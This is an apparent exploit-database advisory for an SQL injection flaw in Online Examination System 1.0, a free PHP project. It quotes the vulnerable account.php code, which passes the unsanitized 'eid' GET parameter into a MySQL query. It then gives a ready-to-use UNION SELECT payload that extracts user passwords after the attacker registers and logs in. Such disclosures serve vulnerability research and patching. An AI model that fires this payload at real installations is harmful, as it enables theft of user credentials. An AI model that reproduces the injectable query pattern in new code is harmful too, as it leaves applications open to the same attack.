Online Examination System 1.0 SQL Injection
Online Examination System version 1.0 suffers from a remote SQL injection vulnerability.
# Exploit Title: Online Examination System - SQL Injection# Google Dork: N/A# Date: 2022-9-28# Exploit Author: yousef alraddadi - https://twitter.com/y0usef_11# Vendor Homepage: https://projectworlds.in/free-projects/php-projects/online-examination/# Software Link: https://github.com/projectworlds32/online-examination-systen-in-php/archive/master.zip# Tested on: windows 11 - XAMPP# CVE : N/A# Version: 1.0Vulnerability Details======================Steps :vulnerable code in file account.php<?phpif(@$_GET['q']== 'quiz' && @$_GET['step']== 2) {$eid=@$_GET['eid'];$q=mysqli_query($con,"SELECT * FROM questions WHERE eid='$eid' AND sn='$sn' " );echo '<div class="panel" style="margin:5%">';while($row=mysqli_fetch_array($q) )?>1) Log in to the application after register new userinject payload paramter eid => eid=5589741f9ed52' union select 1,2,password,4,5 from user--